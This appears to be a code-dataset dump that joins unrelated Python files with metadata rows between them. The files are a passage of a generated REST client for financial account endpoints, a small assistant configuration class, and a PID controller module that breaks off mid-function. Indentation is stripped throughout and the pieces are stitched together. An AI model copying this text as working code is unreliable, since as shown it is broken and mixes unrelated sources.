def get_portfolio_transaction_agg_all_using_get(self, account_id, **kwargs): # noqa: E501
"""List all account transactions # noqa: E501
Get the information for all transactions for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_transaction_agg_all_using_get(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioTransaction
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_portfolio_transaction_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_portfolio_transaction_agg_all_using_get_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_portfolio_transaction_agg_all_using_get_with_http_info(self, account_id, **kwargs): # noqa: E501
"""List all account transactions # noqa: E501
Get the information for all transactions for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_portfolio_transaction_agg_all_using_get_with_http_info(account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param bool ascending: ascending
:param str currency_conversion: USD
:param date end_date: end date
:param str filter: filter
:param str order_by: order_by
:param int page: page
:param int size: size
:param date start_date: start date
:return: PagePortfolioTransaction
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'ascending', 'currency_conversion', 'end_date', 'filter', 'order_by', 'page', 'size', 'start_date'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_portfolio_transaction_agg_all_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `get_portfolio_transaction_agg_all_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
if 'ascending' in params:
query_params.append(('ascending', params['ascending'])) # noqa: E501
if 'currency_conversion' in params:
query_params.append(('currency_conversion', params['currency_conversion'])) # noqa: E501
if 'end_date' in params:
query_params.append(('end_date', params['end_date'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'order_by' in params:
query_params.append(('order_by', params['order_by'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'start_date' in params:
query_params.append(('start_date', params['start_date'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/transaction', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagePortfolioTransaction', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def insert_account_and_related_permission_using_post(self, acl_client_permission_vo, **kwargs): # noqa: E501
"""create an account permission # noqa: E501
create an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insert_account_and_related_permission_using_post(acl_client_permission_vo, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AclClientPermissionVO acl_client_permission_vo: aclClientPermissionVO (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.insert_account_and_related_permission_using_post_with_http_info(acl_client_permission_vo, **kwargs) # noqa: E501
else:
(data) = self.insert_account_and_related_permission_using_post_with_http_info(acl_client_permission_vo, **kwargs) # noqa: E501
return data
def insert_account_and_related_permission_using_post_with_http_info(self, acl_client_permission_vo, **kwargs): # noqa: E501
"""create an account permission # noqa: E501
create an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.insert_account_and_related_permission_using_post_with_http_info(acl_client_permission_vo, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AclClientPermissionVO acl_client_permission_vo: aclClientPermissionVO (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['acl_client_permission_vo'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method insert_account_and_related_permission_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'acl_client_permission_vo' is set
if self.api_client.client_side_validation and ('acl_client_permission_vo' not in params or
params['acl_client_permission_vo'] is None): # noqa: E501
raise ValueError("Missing the required parameter `acl_client_permission_vo` when calling `insert_account_and_related_permission_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'acl_client_permission_vo' in params:
body_params = params['acl_client_permission_vo']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def subscribe_account_using_post(self, account_id, alloc_request, **kwargs): # noqa: E501
"""Subscribe an account # noqa: E501
After creating an account, you may create portfolios for the account to track a client’s investment, savings, or insurance products. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.subscribe_account_using_post(account_id, alloc_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param AccountAllocationMapping alloc_request: allocRequest (required)
:return: list[Portfolio]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.subscribe_account_using_post_with_http_info(account_id, alloc_request, **kwargs) # noqa: E501
else:
(data) = self.subscribe_account_using_post_with_http_info(account_id, alloc_request, **kwargs) # noqa: E501
return data
def subscribe_account_using_post_with_http_info(self, account_id, alloc_request, **kwargs): # noqa: E501
"""Subscribe an account # noqa: E501
After creating an account, you may create portfolios for the account to track a client’s investment, savings, or insurance products. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.subscribe_account_using_post_with_http_info(account_id, alloc_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param AccountAllocationMapping alloc_request: allocRequest (required)
:return: list[Portfolio]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'alloc_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method subscribe_account_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `subscribe_account_using_post`") # noqa: E501
# verify the required parameter 'alloc_request' is set
if self.api_client.client_side_validation and ('alloc_request' not in params or
params['alloc_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `alloc_request` when calling `subscribe_account_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'alloc_request' in params:
body_params = params['alloc_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/subscribe', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Portfolio]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_account_allocation_mapping_using_put(self, account_allocation_id, account_allocation_mapping, **kwargs): # noqa: E501
"""Update an account allocation # noqa: E501
Update the information for an account-allocation mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_allocation_mapping_using_put(account_allocation_id, account_allocation_mapping, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:param object account_allocation_mapping: account_allocation_mapping (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_account_allocation_mapping_using_put_with_http_info(account_allocation_id, account_allocation_mapping, **kwargs) # noqa: E501
else:
(data) = self.update_account_allocation_mapping_using_put_with_http_info(account_allocation_id, account_allocation_mapping, **kwargs) # noqa: E501
return data
def update_account_allocation_mapping_using_put_with_http_info(self, account_allocation_id, account_allocation_mapping, **kwargs): # noqa: E501
"""Update an account allocation # noqa: E501
Update the information for an account-allocation mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_allocation_mapping_using_put_with_http_info(account_allocation_id, account_allocation_mapping, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:param object account_allocation_mapping: account_allocation_mapping (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_allocation_id', 'account_allocation_mapping'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account_allocation_mapping_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_allocation_id' is set
if self.api_client.client_side_validation and ('account_allocation_id' not in params or
params['account_allocation_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_allocation_id` when calling `update_account_allocation_mapping_using_put`") # noqa: E501
# verify the required parameter 'account_allocation_mapping' is set
if self.api_client.client_side_validation and ('account_allocation_mapping' not in params or
params['account_allocation_mapping'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_allocation_mapping` when calling `update_account_allocation_mapping_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_allocation_id' in params:
path_params['account_allocation_id'] = params['account_allocation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_allocation_mapping' in params:
body_params = params['account_allocation_mapping']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation/{account_allocation_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountAllocationMapping', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_account_status_using_put(self, account_status, account_status_id, **kwargs): # noqa: E501
"""Update an account status # noqa: E501
Update an account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_status_using_put(account_status, account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account_status: account_status (required)
:param str account_status_id: UUID account_status_id (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_account_status_using_put_with_http_info(account_status, account_status_id, **kwargs) # noqa: E501
else:
(data) = self.update_account_status_using_put_with_http_info(account_status, account_status_id, **kwargs) # noqa: E501
return data
def update_account_status_using_put_with_http_info(self, account_status, account_status_id, **kwargs): # noqa: E501
"""Update an account status # noqa: E501
Update an account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_status_using_put_with_http_info(account_status, account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account_status: account_status (required)
:param str account_status_id: UUID account_status_id (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_status', 'account_status_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account_status_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_status' is set
if self.api_client.client_side_validation and ('account_status' not in params or
params['account_status'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status` when calling `update_account_status_using_put`") # noqa: E501
# verify the required parameter 'account_status_id' is set
if self.api_client.client_side_validation and ('account_status_id' not in params or
params['account_status_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status_id` when calling `update_account_status_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_status_id' in params:
path_params['account_status_id'] = params['account_status_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_status' in params:
body_params = params['account_status']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status/{account_status_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_account_type_using_put(self, account_type, account_type_id, **kwargs): # noqa: E501
"""Update an account type # noqa: E501
Update the information for a possible account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_type_using_put(account_type, account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account_type: account_type (required)
:param str account_type_id: UUID account_type_id (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_account_type_using_put_with_http_info(account_type, account_type_id, **kwargs) # noqa: E501
else:
(data) = self.update_account_type_using_put_with_http_info(account_type, account_type_id, **kwargs) # noqa: E501
return data
def update_account_type_using_put_with_http_info(self, account_type, account_type_id, **kwargs): # noqa: E501
"""Update an account type # noqa: E501
Update the information for a possible account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_type_using_put_with_http_info(account_type, account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account_type: account_type (required)
:param str account_type_id: UUID account_type_id (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_type', 'account_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account_type_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_type' is set
if self.api_client.client_side_validation and ('account_type' not in params or
params['account_type'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type` when calling `update_account_type_using_put`") # noqa: E501
# verify the required parameter 'account_type_id' is set
if self.api_client.client_side_validation and ('account_type_id' not in params or
params['account_type_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type_id` when calling `update_account_type_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_type_id' in params:
path_params['account_type_id'] = params['account_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_type' in params:
body_params = params['account_type']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type/{account_type_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_account_using_put(self, account, account_id, **kwargs): # noqa: E501
"""Update an account # noqa: E501
Update the information for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_using_put(account, account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account: account (required)
:param str account_id: UUID account_id (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_account_using_put_with_http_info(account, account_id, **kwargs) # noqa: E501
else:
(data) = self.update_account_using_put_with_http_info(account, account_id, **kwargs) # noqa: E501
return data
def update_account_using_put_with_http_info(self, account, account_id, **kwargs): # noqa: E501
"""Update an account # noqa: E501
Update the information for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_using_put_with_http_info(account, account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account: account (required)
:param str account_id: UUID account_id (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account', 'account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account' is set
if self.api_client.client_side_validation and ('account' not in params or
params['account'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account` when calling `update_account_using_put`") # noqa: E501
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `update_account_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account' in params:
body_params = params['account']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_client_account_permission_using_put(self, account_id, acl_client_permission_vo, **kwargs): # noqa: E501
"""Update an account permission # noqa: E501
Update an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_client_account_permission_using_put(account_id, acl_client_permission_vo, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:param object acl_client_permission_vo: aclClientPermissionVO (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_client_account_permission_using_put_with_http_info(account_id, acl_client_permission_vo, **kwargs) # noqa: E501
else:
(data) = self.update_client_account_permission_using_put_with_http_info(account_id, acl_client_permission_vo, **kwargs) # noqa: E501
return data
def update_client_account_permission_using_put_with_http_info(self, account_id, acl_client_permission_vo, **kwargs): # noqa: E501
"""Update an account permission # noqa: E501
Update an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_client_account_permission_using_put_with_http_info(account_id, acl_client_permission_vo, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:param object acl_client_permission_vo: aclClientPermissionVO (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'acl_client_permission_vo'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_client_account_permission_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `update_client_account_permission_using_put`") # noqa: E501
# verify the required parameter 'acl_client_permission_vo' is set
if self.api_client.client_side_validation and ('acl_client_permission_vo' not in params or
params['acl_client_permission_vo'] is None): # noqa: E501
raise ValueError("Missing the required parameter `acl_client_permission_vo` when calling `update_client_account_permission_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'acl_client_permission_vo' in params:
body_params = params['acl_client_permission_vo']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission/{account_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.211802
| 167
| 0.625959
| 15,712
| 135,469
| 5.091713
| 0.01623
| 0.051299
| 0.021
| 0.027
| 0.988863
| 0.985213
| 0.980375
| 0.971713
| 0.965825
| 0.957051
| 0
| 0.016686
| 0.28862
| 135,469
| 3,134
| 168
| 43.22559
| 0.813459
| 0.323277
| 0
| 0.823703
| 1
| 0
| 0.20217
| 0.076147
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035967
| false
| 0
| 0.002358
| 0
| 0.091981
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d10240002c5a216c84e2a273492d6c99b22a5786
| 312
|
py
|
Python
|
src/configuration.py
|
premkamal13/my-ai-assistant
|
8c2e60cf74ae36d0ad1177430651f34a59230f52
|
[
"MIT"
] | 1
|
2019-07-12T07:40:47.000Z
|
2019-07-12T07:40:47.000Z
|
src/configuration.py
|
premkamal13/my-ai-assistant
|
8c2e60cf74ae36d0ad1177430651f34a59230f52
|
[
"MIT"
] | null | null | null |
src/configuration.py
|
premkamal13/my-ai-assistant
|
8c2e60cf74ae36d0ad1177430651f34a59230f52
|
[
"MIT"
] | null | null | null |
class Configuration:
def __init__(self, assistant_name, user_name, wolfram_app_id):
self.assistant_name = assistant_name
self.user_name = user_name
self.wolfram_app_id = wolfram_app_id
def __call__(self):
return [self.assistant_name, self.user_name, self.wolfram_app_id]
| 34.666667
| 73
| 0.724359
| 43
| 312
| 4.697674
| 0.302326
| 0.257426
| 0.237624
| 0.207921
| 0.445545
| 0.237624
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201923
| 312
| 8
| 74
| 39
| 0.811245
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d1270a7fd13b18a0c549eb70355c9167da5fe5c2
| 4,920
|
py
|
Python
|
vplatoon/pid.py
|
aladinoster/vplatoon
|
eb925acfd553d9062273210918e4c4c044dabbe7
|
[
"MIT"
] | 1
|
2020-11-27T00:45:36.000Z
|
2020-11-27T00:45:36.000Z
|
vplatoon/pid.py
|
aladinoster/vplatoon
|
eb925acfd553d9062273210918e4c4c044dabbe7
|
[
"MIT"
] | 2
|
2020-10-26T13:27:13.000Z
|
2020-11-07T08:28:06.000Z
|
vplatoon/pid.py
|
aladinoster/vplatoon
|
eb925acfd553d9062273210918e4c4c044dabbe7
|
[
"MIT"
] | 2
|
2020-10-26T11:04:56.000Z
|
2020-10-27T12:36:02.000Z
|
import numpy as np
from .vehicles import DT, Derivator, Integrator
# ==============================================================================
# Constants
# ==============================================================================
TS = DT # Sampling time
U_MAX = 1 # Control default
# ==============================================================================
# Classes
# ==============================================================================
class PID:
def __init__(self, k_p, k_i, k_d):
# Ziegler Nichols method
# Check here https://en.wikipedia.org/wiki/Ziegler–Nichols_method
# self.k_p = 0.3*K_u
# self.k_i = 1.2*K_u/T_u
# self.k_d = 3*K_u*T_u/40
# self.k_p = 0.45*K_u
# self.k_i = 0.54*K_u/T_u
self.k_p = k_p
self.k_i = k_i
self.k_d = k_d
self.T = TS # Sampling time
self.t = [0]
self.u_p = [0] # Proportional term
self.u_i = [0] # Integral term
self.u_d = [0] # Derivative term
self.control = [0] # Control memory
self.integ = Integrator()
self.diff = Derivator()
def apply_control(self, error):
P = self.k_p * error
self.u_p.append(P)
I = self.k_i * self.integ(error)
self.u_i.append(I)
D = self.k_d * self.diff(error)
self.u_d.append(D)
u_f = self.u_p[-1] + self.u_i[-1] + self.u_d[-1]
self.time_update()
self.control.append(u_f)
return u_f
def time_update(self):
""" time vector"""
self.t.append(self.t[-1] + self.T)
def __call__(self, error):
""" Callable """
return self.apply_control(error)
U_MAX = 10
class PIDlim:
def __init__(self, k_p, k_i, k_d, u_max=U_MAX):
# Ziegler Nichols method
# Check here https://en.wikipedia.org/wiki/Ziegler–Nichols_method
# self.k_p = 0.3*K_u
# self.k_i = 1.2*K_u/T_u
# self.k_d = 3*K_u*T_u/40
# self.k_p = 0.45*K_u
# self.k_i = 0.54*K_u/T_u
self.k_p = k_p
self.k_i = k_i
self.k_d = k_d
self.T = TS # Sampling time
self.t = [0]
self.u_p = [0] # Proportional term
self.u_i = [0] # Integral term
self.u_d = [0] # Derivative term
self.u_max = u_max
self.u_min = -u_max
self.control = [0] # Control memory
self.control_bnd = [0]
self.integ = Integrator()
self.diff = Derivator()
def apply_control(self, error):
P = self.k_p * error
self.u_p.append(P)
I = self.k_i * self.integ(error)
self.u_i.append(I)
D = self.k_d * self.diff(error)
self.u_d.append(D)
u_f = self.u_p[-1] + self.u_i[-1] + self.u_d[-1]
self.control.append(u_f)
# Bound control
u_f = max(self.u_min, min(u_f, self.u_max))
self.control_bnd.append(u_f)
self.time_update()
return u_f
def time_update(self):
""" time vector"""
self.t.append(self.t[-1] + self.T)
def __call__(self, error):
""" Callable """
